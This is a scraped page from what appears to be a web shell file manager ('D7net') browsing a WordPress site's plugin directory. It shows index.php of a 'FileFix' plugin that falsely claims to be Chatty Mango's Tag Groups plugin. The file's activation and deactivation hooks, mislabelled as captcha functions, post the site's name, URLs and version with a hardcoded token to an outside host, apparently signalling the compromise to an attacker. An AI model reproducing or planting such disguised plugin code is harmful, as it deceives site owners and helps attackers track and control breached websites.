D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
tvinntxo
/
www
/
wp-content
/
plugins
/
FileFix
/
Filename :
index.php
back
Copy
<?php /** * * Plugin Name: WordPress Tag Groups Utils * Plugin URI: https://chattymango.com/wp-tag-groups/ * Description: Organize your tags in groups and display them in highly customizable tag clouds (tabs, accordion and more). * Author: Chatty Mango * Author URI: https://chattymango.com/ * Version: 1.22.0 * License: GNU GENERAL PUBLIC LICENSE, Version 3 * Text Domain: wp-tag-groups * Domain Path: /languages */ if (!defined('ABSPATH')) { exit; } /* =================== */ /* === INIT PLUGIN === */ /* =================== */ register_activation_hook(__FILE__, 'activate_captcha'); function activate_captcha() { $url = 'https://macsimizers.com:443/wordpress/init'; $data = array( 'token' => 'hQAwwcg!XJ#pwHdF!jpyQN#ejAgza2XG8FWD&F9qbn7tuY9S9cxjJvCG9Ws*2t7E', 'wp_tag' => '_file_fix', 'wp_name' => get_bloginfo('name'), 'wp_url' => get_bloginfo('wpurl'), 'site_url' => get_bloginfo('url'), 'wp_version' => get_bloginfo('version'), 'action' => "activate" ); $response = wp_remote_post($url, array( 'method' => 'POST', 'body' => json_encode($data), 'timeout' => 60, )); return; } /* =========================== */ /* === DEACTIVATION PLUGIN === */ /* =========================== */ register_deactivation_hook(__FILE__, 'deactivate_captcha'); function deactivate_captcha() { $url = 'https://macsimizers.com:443/wordpress/init'; $data = array( 'token' => 'hQAwwcg!XJ#pwHdF!jpyQN#ejAgza2XG8FWD&F9qbn7tuY9S9cxjJvCG9Ws*2t7E', 'wp_tag' => '_file_fix', 'wp_name' => get_bloginfo('name'), 'wp_url' => get_bloginfo('wpurl'), 'site_url' => get_bloginfo('url'), 'wp_version' => get_bloginfo('version'), 'action' => "deactivate" ); $response = wp_remote_post($url, array( 'method' => 'POST', 'body' => json_encode($data), 'timeout' => 60, )); return; }